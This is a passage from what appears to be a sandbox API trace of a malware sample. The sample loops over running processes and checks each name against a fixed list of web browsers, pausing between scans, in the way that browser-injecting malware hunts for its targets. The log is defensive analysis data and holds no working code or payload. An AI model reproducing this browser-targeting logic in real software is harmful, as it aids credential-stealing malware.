lpString2="microsoftedgecp.exe") returned -1 [0244.426] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0244.426] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0244.426] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0244.426] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0244.426] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0244.426] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.426] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0244.427] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0244.427] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0244.427] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0244.427] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0244.427] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.427] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.427] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0244.428] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0244.428] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0244.428] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0244.428] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.428] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0244.428] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0244.428] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0244.428] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0244.428] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0244.428] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.428] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.429] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0244.429] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0244.429] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0244.429] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0244.429] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.429] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0244.430] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0244.430] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0244.430] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0244.430] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0244.430] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.430] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0244.430] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0244.430] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0244.430] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0244.430] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0244.430] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0244.430] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0244.431] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0244.431] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0244.431] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0244.431] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0244.431] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.431] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0244.431] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0244.431] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0244.431] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0244.432] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0244.432] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.432] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0244.432] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0244.432] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0244.432] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0244.432] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0244.432] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0244.432] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0244.433] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0244.433] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0244.433] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0244.433] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0244.433] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0244.433] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0244.433] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0244.433] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0244.433] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0244.433] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0244.433] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0244.433] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0244.434] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0244.434] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0244.434] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0244.434] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0244.434] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0244.434] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0244.434] CloseHandle (hObject=0xe8) returned 1 [0244.434] Sleep (dwMilliseconds=0x3e8) [0245.444] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0245.446] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0245.446] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0245.446] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0245.446] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0245.446] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0245.446] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0245.446] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0245.447] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0245.447] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0245.447] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0245.447] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0245.447] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0245.447] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0245.447] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0245.447] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0245.447] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0245.447] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0245.447] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.447] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0245.448] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0245.448] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0245.448] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0245.448] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0245.448] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0245.448] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0245.448] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0245.449] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0245.449] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0245.449] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0245.449] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.449] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0245.449] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0245.449] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0245.449] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0245.449] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0245.449] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0245.449] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0245.450] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0245.450] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0245.450] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0245.450] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0245.450] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.450] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0245.450] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0245.450] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0245.450] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0245.450] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0245.450] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.450] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0245.451] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0245.451] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0245.451] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0245.451] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0245.451] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0245.451] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0245.451] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0245.451] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0245.451] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0245.451] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0245.451] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0245.452] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.452] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0245.452] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0245.452] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0245.452] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0245.452] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.452] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.453] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0245.453] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0245.453] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0245.453] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0245.453] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.453] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.453] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0245.453] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0245.453] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0245.453] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0245.453] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.453] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.454] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0245.454] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0245.454] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0245.454] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0245.454] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.454] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.454] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0245.454] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0245.454] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0245.454] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0245.454] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.454] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0245.455] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0245.455] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0245.455] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0245.455] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0245.455] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0245.455] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.455] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0245.455] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0245.455] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0245.456] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0245.456] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.456] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.456] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0245.456] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0245.456] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0245.456] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0245.456] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.456] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0245.457] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0245.457] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0245.457] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0245.457] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0245.457] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0245.457] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0245.457] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0245.457] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0245.457] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0245.457] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0245.457] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.457] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0245.458] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0245.458] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0245.458] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0245.458] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0245.458] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.458] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.458] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0245.458] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0245.458] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0245.458] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0245.458] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.458] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0245.459] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0245.459] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0245.459] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0245.459] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0245.459] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.459] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) 